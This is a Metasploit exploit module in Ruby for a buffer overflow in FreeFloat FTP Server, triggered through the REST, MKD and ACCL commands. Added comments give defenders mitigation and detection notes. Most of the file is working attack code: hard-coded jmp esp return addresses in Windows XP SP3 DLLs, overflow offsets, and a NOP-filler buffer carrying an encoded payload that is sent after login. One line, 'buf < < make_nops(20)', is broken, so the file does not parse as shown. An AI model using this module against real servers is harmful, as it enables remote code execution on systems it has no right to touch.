$Id: fftp_bof.rb 2011-09-01 20:14 KedAns-Dz $

require 'msf/core'

# Metasploit remote exploit module for the FreeFloat FTP Server buffer
# overflow that, per the module description, is reachable through the
# REST, MKD and ACCL FTP commands.
#
# Reviewer notes for defenders:
# * Every target carries a hard-coded absolute return address inside a
#   Windows system DLL (see the 'Ret' comments). The module therefore relies
#   on those DLLs being loaded at a fixed base with an executable stack,
#   which is what the listed Windows XP SP3 targets provide. ASLR and DEP
#   are the platform mitigations that break this assumption.
# * The request sent in #exploit is a single FTP command whose argument is
#   several hundred bytes of binary data. A length/charset check on FTP
#   command arguments, in the server or in a network sensor, detects or
#   blocks it regardless of which of the three commands is used.
# * The command is only sent after connect_login succeeds, so restricting
#   who can log in to the FTP service narrows exposure.
class Metasploit3 < Msf::Exploit::Remote

# Reliability ranking declared by the module author.
Rank = GoodRanking

# FTP client mixin; supplies connect_login, send_cmd and disconnect used below.
include Msf::Exploit::Remote::Ftp

# Registers the module metadata: name, description, credits, references,
# payload constraints and the three per-command targets.
#
# @param info [Hash] metadata overrides merged in by update_info
def initialize(info = {})

super(update_info(info,

'Name' => 'FreeFloat FTP Server Multiple Remote Buffer Overflow Exploit',

'Description' => %q{

This module exploits a FreeFloat FTP Server Buffer Overflow

found in the MKD/REST/ACCL command's.

},

'Author' => [

'C4SS!0 G0M3S', # Discovery Vuln.

'KedAns-Dz' # Metasploit Module

],

'License' => MSF_LICENSE,

'Version' => '$Revision: 0.1',

# The three Exploit-DB entries the module credits as its sources.
'References' =>

[

[ 'URL', 'http://www.exploit-db.com/exploits/17539' ],

[ 'URL', 'http://www.exploit-db.com/exploits/17546' ],

[ 'URL', 'http://www.exploit-db.com/exploits/17550' ], # by mortis

],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

},

'Payload' =>

{

# Bytes the encoded payload must not contain: NUL, LF and CR.
# CR/LF end an FTP command line, so they would cut the request short.
'BadChars' => "\x00\x0a\x0d",

},

'Platform' => 'win',

# Each target pairs an FTP command ('CMD') with the filler length
# ('Offset') placed before the 4-byte return address ('Ret').
# NOTE(review): the 'Ret' values are fixed addresses inside system DLLs;
# presumably they hold only for the exact DLL builds of the XP SP3 systems
# named in the target strings -- confirm before relying on them in a lab.
'Targets' =>

[

[ 'FreeFloat FTP Server (Windows XP-SP3 / REST command)',

{

'Ret' => 0x7C874413, # jmp esp - (KERNEL32.DLL)

'Offset' => 246,

'CMD' => 'REST'

}

],

[ 'FreeFloat FTP Server (Windows XP-SP3 / MKD command)',

{

'Ret' => 0x7cb97475, # jmp esp - (SHELL32.DLL)

'Offset' => 247,

'CMD' => 'MKD'

}

],

[ 'FreeFloat FTP Server (Windows XP-SP3 / ACCL command)',

{

'Ret' => 0x7C874413, # jmp esp - (KERNEL32.DLL)

'Offset' => 246,

'CMD' => 'ACCL'

}

],

],

# Index 1 selects the MKD target above.
'DefaultTarget' => 1))

end

# Logs in to the FTP service, builds the oversized command argument for the
# selected target and sends it as a single FTP command.
#
# Argument layout, as assembled below:
#   filler ('Offset' bytes) + return address (4 bytes, little-endian)
#   + 20 more filler bytes + encoded payload
def exploit

# Authenticates first; the vulnerable command is only reached after login.
connect_login

print_status("Trying target #{target.name}...")

# Filler comes from make_nops rather than a literal byte string, so a
# network signature should key on argument length, not on specific bytes.
buf = make_nops(target['Offset']) + [target.ret].pack('V')

# NOTE(review): `< <` is not a valid Ruby operator, so the file does not
# parse as shown; this looks like an extraction artifact on this page.
buf < < make_nops(20)

buf << payload.encoded

# Second argument false: the reply to the command is not read.
send_cmd( [target['CMD'], buf] , false )

handler

disconnect

end

end
